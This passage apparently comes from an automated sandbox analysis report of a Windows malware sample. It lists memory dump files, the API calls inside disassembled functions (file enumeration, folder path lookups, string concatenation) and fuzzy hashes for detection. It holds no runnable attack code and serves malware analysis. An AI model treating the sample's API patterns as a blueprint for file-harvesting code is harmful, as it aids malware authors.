                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: cb1a654887b64a27c2fcbea9fe89a6de1216557b29e7607b687837aa3505dc7c
                          • Instruction ID: 7d8bc08a4fa027702893502ce1c42bcead2e43946b4370fad9d373937ec899f6
                          • Opcode Fuzzy Hash: cb1a654887b64a27c2fcbea9fe89a6de1216557b29e7607b687837aa3505dc7c
                          • Instruction Fuzzy Hash: E0F0873AE40208BBDB14DBF0DC08BAE77B9BB48320F10C254BA15A72D0D775AA04CB40
                          Function 0017C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 0017C74E
                            • Part of subcall function 0017BF9F: __amsg_exit.LIBCMT ref: 0017BFAF
                          • __getptd.LIBCMT ref: 0017C765
                          • __amsg_exit.LIBCMT ref: 0017C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0017C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: a4a6dfb4d736cd7b457577d5d9845fbe2c1bd170493ec1750bc9c299e1b2c873
                          • Instruction ID: 02df89f9bf68da92e9c604572d98d9daa74550e535a787f9b803dc4007984ed9
                          • Opcode Fuzzy Hash: a4a6dfb4d736cd7b457577d5d9845fbe2c1bd170493ec1750bc9c299e1b2c873
                          • Instruction Fuzzy Hash: 27F09A329486009BD728BBB89886B4E33B06F20B20F20C14DF40DA72D2CF645A809FD6
                          Function 00174F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00174F7A
                          • lstrcat.KERNEL32(?,00181070), ref: 00174F97
                          • lstrcat.KERNEL32(?,00CC91C8), ref: 00174FAB
                          • lstrcat.KERNEL32(?,00181074), ref: 00174FBD
                            • Part of subcall function 00174910: wsprintfA.USER32 ref: 0017492C
                            • Part of subcall function 00174910: FindFirstFileA.KERNEL32(?,?), ref: 00174943
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,00180FDC), ref: 00174971
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,00180FE0), ref: 00174987
                            • Part of subcall function 00174910: FindNextFileA.KERNEL32(000000FF,?), ref: 00174B7D
                            • Part of subcall function 00174910: FindClose.KERNEL32(000000FF), ref: 00174B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: bb37eab8e88f3beeaa2dc113c6b8993e5368f024131e44bf80331adb168214fd
                          • Instruction ID: 764506a482e21f42ea94a478ed780eef602420c1deb8059751fcd8833a57e076
                          • Opcode Fuzzy Hash: bb37eab8e88f3beeaa2dc113c6b8993e5368f024131e44bf80331adb168214fd
                          • Instruction Fuzzy Hash: 8D21887790020867C795FBA0DC46EED777CABAA300F004558B65A97181EF749BC9CB92